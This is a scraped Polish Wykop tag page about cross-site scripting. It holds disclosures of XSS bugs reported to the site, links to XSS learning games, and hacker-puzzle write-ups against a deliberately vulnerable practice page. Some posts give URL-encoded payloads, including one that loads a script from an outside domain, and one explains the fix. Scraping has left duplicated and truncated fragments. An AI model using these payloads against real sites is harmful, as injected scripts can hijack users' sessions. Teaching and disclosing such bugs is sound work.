konto usunięte
a może zabawa z #xss #hacking https://xss-game.appspot.com/
- konto usunięte
- konto usunięte
- luki_sk
- Cronox
Wszystko
Wszystkie
Archiwum
Kto chce zobaczyć XSSa na wykopie, niech wchodzi na mój profil - może to zmotywuje kogoś w supporcie by to naprawili. Plusiki mile widziane ( ͡° ͜ʖ ͡°)
@a__s, może Ty szepniesz tam komuś by sprawdzili czasami zgłoszenia w supporcie xD
#wykop #xss #davyjonespsujewykop <- to tak na zaś gdybym jeszcze coś złapał
@a__s, może Ty szepniesz tam komuś by sprawdzili czasami zgłoszenia w supporcie xD
#wykop #xss #davyjonespsujewykop <- to tak na zaś gdybym jeszcze coś złapał
- konto usunięte
- konto usunięte
- BigKrs
- nietopies
- deryt
- +4 innych
kulmegil
@Davy__Jones: buuu coś szybko naprawili ( ͡° ʖ̯ ͡°)
- konto usunięte
- konto usunięte
konto usunięte
@kulmegil: eh, spodziewałem się przynajmniej zwykłego 'dziękuję' ( ͡° ʖ̯ ͡°)
- kulmegil
- konto usunięte
Reflected XSS na Wykopie.
Zgłoszony do administracji i usunięty w niecałe 24h.
#security #bezpieczenstwo #xss
Zgłoszony do administracji i usunięty w niecałe 24h.
#security #bezpieczenstwo #xss
źródło: comment_Gfm0jRPrmbMRL77kUxOUthhZZWH8MTrg.jpg
Pobierz- konto usunięte
- konto usunięte
- moooka
- maniac777
- Ziemeck
- +8 innych
@nehemiah: mozilla nie ogarnia
Safety Online - [SECURITY] PayPal Stored XSS
![Safety Online - [SECURITY] PayPal Stored XSS](https://wykop.pl/cdn/c3397993/link_H7a0kv7dg68RteoaGhpo5vTrqOXiBjZF,w220h142.jpg)
Nowoodkryta podatność w systemie transakcyjnym PayPal pozwala na kradzież Twoich...
z- Dodaj Komentarz
- #
- #
- #
- #
Persistent XSS na stronie głównej wykop.pl
XSS na wykopie :)
z- Dodaj Komentarz
- #
- #
- #
» * [0day] WordPress 4.2 stored XSS
Prosty do wykonania i dość niebezpieczny XSS dla najnowszego WordPressa...
z- Dodaj Komentarz
- #
- #
- #
- #
» * Uwaga gracze – włamanie do twitch.tv
Właściciele Twitch.tv podejrzewają że miał miejsce nieautoryzowany dostęp do baz danych serwisu twitch.tv. Nie wiadomo ile i co zostało skradzione.
z- 1
- #
- #
- #
- #
- #
XSS w książce… Aktywowany on-line
Nikt nie dziwi się tym, że w wielu książkach o bezpieczeństwie można znaleźć przykłady wykorzystania podatności XSS. Jednak ciekawe jest to, że czasem takiego "papierowego" XSS-a można aktywować on-line.
z- 2
- #
- #
- #
- #
- #
- #
XSS w rekordach DNS
- 2
- #
- #
- #
Ktoś z Was wykona XSS? ;)
http://xssgame.vulnerable.pl/index.php
#hacking #hackujo #xss #zagadkihakerskie
http://xssgame.vulnerable.pl/index.php
#hacking #hackujo #xss #zagadkihakerskie
https://xss-game.appspot.com
Prosta gra stworzona przez #google ułatwiająca poznanie podstawowych błędów #xss
#programowanie #webdev #bezpieczenstwo #hacking
Prosta gra stworzona przez #google ułatwiająca poznanie podstawowych błędów #xss
#programowanie #webdev #bezpieczenstwo #hacking
- kamdz
- Crisu
- filip_k
- MacDada
- konto usunięte
- +4 innych
Jeden z największych sklepów w Krakowie, podobno szukają programistów.
http://i.imgur.com/opna6Ug.jpg
#zepsujo #xss
http://i.imgur.com/opna6Ug.jpg
#zepsujo #xss
#zagadkihakerskie #security #programowanie
Proponuję kolejną zagadkę hakerską, znów na tapetę bierzemy #xss. Pod adresem http://hakerium.cba.pl/zad8/ znajduje się strona z banalną podatnością typu XSS. Wystarczy wpisać dowolny tekst HTML i zostanie on wyświetlony na stronie, np. http://hakerium.cba.pl/zad8/?imie=%3Cscript%3Ealert%281%29%3C/script%3E
Na czym polega więc zagadka, skoro już podałem rozwiązanie? Ano na tym, że pole
jest ograniczone do 30 znaków. A zatem najprostszy
da radę wykonać, ale odrobinę bardziej skomplikowany
już nie: http://hakerium.cba.pl/zad8/?imie=%3Cscript%3Ealert%28document.domain%29%3C/script%3E
Proponuję kolejną zagadkę hakerską, znów na tapetę bierzemy #xss. Pod adresem http://hakerium.cba.pl/zad8/ znajduje się strona z banalną podatnością typu XSS. Wystarczy wpisać dowolny tekst HTML i zostanie on wyświetlony na stronie, np. http://hakerium.cba.pl/zad8/?imie=%3Cscript%3Ealert%281%29%3C/script%3E
Na czym polega więc zagadka, skoro już podałem rozwiązanie? Ano na tym, że pole
imiejest ograniczone do 30 znaków. A zatem najprostszy
alert(1)da radę wykonać, ale odrobinę bardziej skomplikowany
alert(document.domain)już nie: http://hakerium.cba.pl/zad8/?imie=%3Cscript%3Ealert%28document.domain%29%3C/script%3E
@AleFermat: @rationalistic: @kavillock:
http://hakerium.cba.pl/zad8/?imie=%3Cscript+src%3D%22%2F%2Fkzlk.pl%2F%22%2F%3E
Jakby domena nie działała (przed chwilą zarejestrowałem) to dopiszcie sobie do pliku hosts:
http://hakerium.cba.pl/zad8/?imie=%3Cscript+src%3D%22%2F%2Fkzlk.pl%2F%22%2F%3E
Jakby domena nie działała (przed chwilą zarejestrowałem) to dopiszcie sobie do pliku hosts:
178.63.136.164 kzlk.pl@koziolek: @rationalistic: OK, a więc rozwiązanie, o które mi chodziło:
Skorzystamy z tagu iframe i umieścimy XSS-owaną domenę wewnątrz tego iframe'a. Ze względu na same origin policy nie ma możliwości odwoływać się do jakichkolwiek atrybutów strony wewnątrz iframe'a, jeśli ta jest z innej domeny (z kilkoma wyjątkami, m.in.
, który tutaj akurat się nie przysłuży). Istnieje jednak pewien atrybut, na który poprzez iframe'a możemy mieć wpływ - jest nim
Skorzystamy z tagu iframe i umieścimy XSS-owaną domenę wewnątrz tego iframe'a. Ze względu na same origin policy nie ma możliwości odwoływać się do jakichkolwiek atrybutów strony wewnątrz iframe'a, jeśli ta jest z innej domeny (z kilkoma wyjątkami, m.in.
postMessage, który tutaj akurat się nie przysłuży). Istnieje jednak pewien atrybut, na który poprzez iframe'a możemy mieć wpływ - jest nim
#security
Opowiem o ciekawym przypadku #xss, który znalazłem ostatnio na #wykop i został już naprawiony. Ciekawy jest dlatego, że nie tak łatwo go wyexploitować... Ale po kolei.
Podatność występowała na niektórych podstronach bezpośrednio w adresach. Gdy w adresie został umieszczony znak cudzysłowia, a następnie nawiasy ostre, można było wyjść z tagu i wprowadzić dowolny kod HTML. Przykład na screenie: http://i.imgur.com/ulCWnvo.png
Może się wydawać: no to jesteśmy w domu, mamy XSS-a! Praktyczne
Opowiem o ciekawym przypadku #xss, który znalazłem ostatnio na #wykop i został już naprawiony. Ciekawy jest dlatego, że nie tak łatwo go wyexploitować... Ale po kolei.
Podatność występowała na niektórych podstronach bezpośrednio w adresach. Gdy w adresie został umieszczony znak cudzysłowia, a następnie nawiasy ostre, można było wyjść z tagu i wprowadzić dowolny kod HTML. Przykład na screenie: http://i.imgur.com/ulCWnvo.png
Może się wydawać: no to jesteśmy w domu, mamy XSS-a! Praktyczne
- rss
- fledgeling
- snx
- Japuch
- eXtreme
- +12 innych
Czy po przez XSS można wgrać pliki na serwer lub odczytać pliki istniejące na komputerze?
#javascript #xss #hakujo
#javascript #xss #hakujo
Zawodowy hacker. Wywiad z pentesterem.
Wywiad z Dawidem Bałutem, który opowiada o swojej pracy pentestera, o znalezionych lukach w takich dużych serwisach jak Facebook, PayPal, Allegro, Groupon, Amazon, o ignorancji administracji, zastraszaniu sądem i o tym jak wygląda praca zawodowego hackera.
z- 17
- #
- #
- #
- #
- #
- #
- #
#zagadkihakerskie #programowanie #xss #js #html
Ostatnio rzuciłem kolejne wyzwanie związane z bezpieczeństwem stron internetowych. Strona pod adresem http://hakerium.cba.pl/zad2/ jest podatna na błąd typu Cross-Site Scripting (XSS) i celem zadania było dołączenie pliku z zewnętrznej domeny. Zaproponowałem plik spod adresu http://pastebin.com/raw.php?i=mYM90ckz który po prostu wyświetla alert, ale oczywiście można go dużo bardziej rozwinąć.
Sama strona umożliwiała dodawanie komentarzy o długości co najwyżej 100 znaków. Zacznijmy od analizy jak ta strona działa i dlaczego
Ostatnio rzuciłem kolejne wyzwanie związane z bezpieczeństwem stron internetowych. Strona pod adresem http://hakerium.cba.pl/zad2/ jest podatna na błąd typu Cross-Site Scripting (XSS) i celem zadania było dołączenie pliku z zewnętrznej domeny. Zaproponowałem plik spod adresu http://pastebin.com/raw.php?i=mYM90ckz który po prostu wyświetla alert, ale oczywiście można go dużo bardziej rozwinąć.
Sama strona umożliwiała dodawanie komentarzy o długości co najwyżej 100 znaków. Zacznijmy od analizy jak ta strona działa i dlaczego
- Kaerl
- eDameXxX
- draqul
- aRth
- konto usunięte
- +15 innych
Ochrona przed zagrożeniem:
Błąd na tej stronie jest całkiem ciekawy, ponieważ strona enkoduje dane wyjściowe (tj. np. znak
jest zamieniany na
, a
jest zamieniany na
). Pomimo tego i tak udaje się znaleźć podatność i wykorzystać błąd. Wynika to z niedostosowania się do pewnych dobrych standardów w HTML-u. W tym przypadku wystarczyło atrybut wartość atrybutu
umieścić w cudzysłowach i błędu już by nie było. Wniosek jest
Błąd na tej stronie jest całkiem ciekawy, ponieważ strona enkoduje dane wyjściowe (tj. np. znak
<jest zamieniany na
<, a
"jest zamieniany na
"). Pomimo tego i tak udaje się znaleźć podatność i wykorzystać błąd. Wynika to z niedostosowania się do pewnych dobrych standardów w HTML-u. W tym przypadku wystarczyło atrybut wartość atrybutu
titleumieścić w cudzysłowach i błędu już by nie było. Wniosek jest